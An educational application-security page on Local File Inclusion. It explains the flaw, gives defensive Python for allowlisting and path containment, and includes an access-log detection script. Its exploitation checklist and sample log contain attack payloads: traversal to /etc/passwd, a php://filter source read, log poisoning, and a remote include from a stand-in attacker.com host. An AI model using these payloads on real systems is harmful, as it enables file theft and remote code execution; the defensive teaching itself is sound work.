AppSecExplained
Local file inclusion

What is it?

Local File Inclusion (LFI) is a vulnerability that allows an attacker to read, and sometimes execute, files on the victim’s system. It can lead to the disclosure of sensitive information or even remote code execution when the application handles the included path poorly.

A simple example:

  • A vulnerable web application may have the endpoint /page?file=(unknown)

  • When a request is made, the application includes the specified file into the current script.

  • If an attacker inserts a path into (unknown) such as ../../../etc/passwd, they might get access to the system files.

  • The application then includes this file, and if the file contents are output to the response, the attacker can view sensitive system information.

It's important to note that a payload or attack may change depending on the application and the server's file system. LFI can often lead to:

  • Sensitive data exposure

  • Remote code execution

  • Server information disclosure
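The mechanism above comes down to one untrusted string being turned into a filesystem path. The following added example (not code from the original page) shows that bug beside the two controls that remove it: an allowlist of page names, and a canonicalise-then-check-containment step for cases where an allowlist is impossible. It is written in Python so it runs anywhere, but the checks are language-agnostic and apply equally to a PHP include(). The directory and page names are assumptions; real code should also resolve symlinks with os.path.realpath, which is omitted here only so the example runs without the directory existing.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Constructed example values (not from the page): the directory the application
# is allowed to include from, and the fixed set of pages it actually serves.
PAGES_DIR = "/var/www/app/pages"
KNOWN_PAGES = {"home", "about", "contact"}


def vulnerable_include_path(file_param: str) -> str:
    """The bug described above: the parameter is concatenated straight into the
    path that gets included, so '../' sequences walk out of PAGES_DIR."""
    return PAGES_DIR + "/" + file_param


def contained_path(file_param: str, base: str = PAGES_DIR) -> Optional[str]:
    """Defence in depth for when an allowlist is not possible: canonicalise the
    requested path and confirm it still lies strictly inside `base`.
    Returns the path to include, or None when the request must be refused."""
    value = file_param
    # Decode percent-encoding until stable, so %2e%2e%2f and double-encoded
    # variants are judged on the characters the filesystem would actually see.
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    # Stream wrappers (php://, data://, ...) and remote URLs are never legitimate
    # page names; refusing them also closes the RFI case if allow_url_include is on.
    if "://" in value:
        return None
    # NUL bytes historically truncated the path inside C-backed string handling.
    if "\x00" in value:
        return None
    # Treat backslashes as separators so Windows-style traversal is normalised too.
    value = value.replace("\\", "/")
    base = posixpath.normpath(base)
    candidate = posixpath.normpath(posixpath.join(base, value))
    # An absolute value makes join() discard base; normpath collapses '..'.
    # Either way the result must still sit strictly below base.
    # (Production code: apply os.path.realpath here as well to defeat symlinks.)
    if candidate == base or posixpath.commonpath([base, candidate]) != base:
        return None
    return candidate


def safe_include_path(file_param: str) -> Optional[str]:
    """Strongest control: map the parameter onto a fixed set of page names so the
    user never supplies a path at all, then still run the containment check."""
    if file_param not in KNOWN_PAGES:
        return None
    return contained_path(file_param + ".php")


if __name__ == "__main__":
    for probe in ("home", "../../../etc/passwd",
                  "php://filter/read=convert.base64-encode/resource=index.php"):
        print(f"{probe!r:70} allowlist={safe_include_path(probe)!r} "
              f"contained={contained_path(probe)!r}")
```

The allowlist is the control to reach for first: when the parameter is a key into a fixed table rather than a path, traversal, wrappers and remote URLs all stop being meaningful. The containment check exists for legacy code that must accept arbitrary file names under a directory, and it only holds if decoding, separator normalisation and canonicalisation all happen before the comparison.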

Other learning resources:

  • PortSwigger: https://portswigger.net/web-security/file-path-traversal

  • PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion

Checklist

Exploitation

Basic file inclusion

../../../etc/passwd

Using PHP filter for base64 encoding of the file

php://filter/read=convert.base64-encode/resource=index.php

Log poisoning

../../../var/log/apache2/access.log

RFI (if allow_url_include is on)

http://attacker.com/malicious.txt
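Each of the four payload classes listed above leaves a distinctive trace in the web server's access log, which makes them a good basis for a detection rule. The following added example (not code from the original page) parses Apache combined-format log lines, decodes each query parameter value the way the application would, and flags traversal sequences, PHP stream wrappers, remote URLs and references to sensitive files such as /etc/passwd or the log directory. The sample log lines, IP addresses and timestamps are constructed for the example; the request values are the ones from this page.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (Apache combined format). Hosts, IPs and
# timestamps are invented; the file= values are the payload classes from this page.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /page?file=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /page?file=../../../etc/passwd HTTP/1.1" 200 1844 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /page?file=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1844 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:50 +0000] "GET /page?file=php://filter/read=convert.base64-encode/resource=index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:56:01 +0000] "GET /page?file=../../../var/log/apache2/access.log HTTP/1.1" 200 98304 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:56:10 +0000] "GET /page?file=http://attacker.com/malicious.txt HTTP/1.1" 500 0 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:57:00 +0000] "GET /about HTTP/1.1" 200 300 "-" "curl/8.0"
"""

# Apache combined log: client, ident, user, [timestamp], "METHOD target PROTO", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Path fragments that a page parameter should never legitimately reference.
SENSITIVE_FILES = ("etc/passwd", "etc/shadow", "var/log/", "proc/self/")
REMOTE_SCHEMES = ("http", "https", "ftp")


def classify_value(value: str) -> List[str]:
    """Return the list of finding labels for one decoded parameter value."""
    decoded = value
    # Decode until stable so double-encoded variants are seen as the app sees them.
    for _ in range(3):
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    findings: List[str] = []
    low = decoded.lower()
    if re.search(r"\.\.[/\\]", decoded):
        findings.append("path-traversal")
    scheme_match = re.match(r"^([a-z][a-z0-9+.-]*)://", low)
    if scheme_match:
        scheme = scheme_match.group(1)
        findings.append("remote-include" if scheme in REMOTE_SCHEMES
                        else f"stream-wrapper:{scheme}")
    if any(fragment in low for fragment in SENSITIVE_FILES):
        findings.append("sensitive-file")
    return findings


def scan_log(text: str) -> List[Dict[str, object]]:
    """Parse combined-format lines and return one alert per request with findings."""
    alerts: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; a real pipeline would count these
        parts = urlsplit(m.group("target"))
        # Inspect the path itself and every query value (parse_qsl decodes once).
        values = [parts.path] + [v for _, v in parse_qsl(parts.query, keep_blank_values=True)]
        findings: List[str] = []
        for v in values:
            for f in classify_value(v):
                if f not in findings:
                    findings.append(f)
        if findings:
            alerts.append({"ip": m.group("ip"), "time": m.group("ts"),
                           "status": m.group("status"), "target": m.group("target"),
                           "findings": findings})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"{alert['time']} {alert['ip']} {alert['status']} "
              f"{', '.join(alert['findings'])} :: {alert['target']}")
```

Rules like these belong close to the application (reverse proxy or WAF logs) as well as in the SIEM, because a 200 response with an unusually large body on a traversal request, as in the log-file line above, is the signal that the inclusion succeeded rather than merely being attempted.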

Last updated 1 year ago